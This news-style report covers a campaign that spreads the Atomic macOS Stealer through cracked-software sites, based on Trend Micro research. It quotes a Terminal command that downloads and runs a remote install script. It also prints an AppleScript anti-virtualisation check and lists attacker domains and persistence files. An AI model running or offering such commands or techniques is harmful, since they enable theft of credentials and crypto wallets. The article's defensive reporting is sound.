Cybersecurity

A malware campaign targeting macOS users has been identified, leveraging the demand for free software to distribute the Atomic macOS Stealer (AMOS). The malware is disguised as cracked versions of popular applications, leading users to inadvertently compromise their systems.

AMOS challenges the perception of macOS security, as it collects sensitive information such as browser credentials, cryptocurrency wallets, Telegram conversations, VPN configurations, keychain data, Apple Notes, and various document files. This poses a significant risk both to individual users and enterprise environments, where compromised credentials could result in broader security breaches.

Trend Micro researchers discovered this campaign through their Managed Detection and Response services, highlighting the malware’s use of social engineering techniques to bypass traditional security measures. The primary distribution vector is websites like haxmac.cc, which distribute cracked macOS applications.

The malware employs a complex distribution strategy involving rotating domains, including dtxxbz1jq070725p93[.]cfd, goipbp9080425d4[.]cfd, and im9ov070725iqu[.]cfd. These redirect victims to landing pages on ekochist.com, misshon.com, and toutentris.com, where two main installation methods are presented.

Terminal-Based Installation and Persistence Mechanisms

The malware’s installation often involves instructing users to execute commands in the macOS Terminal, effectively bypassing Apple’s Gatekeeper security feature. Users are prompted to execute commands such as:

curl - fsSL https://goatramz[.]com/get4/install[.]sh | bash

This command downloads and runs an installation script that performs several operations, including downloading an AppleScript file named “update,” which conducts anti-virtualization checks:

set memData to do shell script "system_profiler SPMemoryDataType"
if memData contains "QEMU" or memData contains "VMware" then 
    set exitCode to 100
else
    set exitCode to 0
end if

Persistence is established through a multi-component system involving a primary stealer binary (.helper) for data collection, a monitoring script ([.]agent) to detect user login sessions, and a LaunchDaemon configuration file (com[.]finder[.]helper[.]plist) to ensure the malware survives system reboots.

The persistence mechanism involves the .agent script monitoring active user sessions and executing the .helper binary accordingly. This setup ensures continuous operation while remaining discreet.

Data exfiltration is achieved by sending compressed ZIP archives via HTTP POST requests to command-and-control servers, with custom headers for unique identification of each infected system. The malware’s capabilities, combined with its evasion and persistence strategies, present a significant threat to macOS users acquiring software from unreliable sources.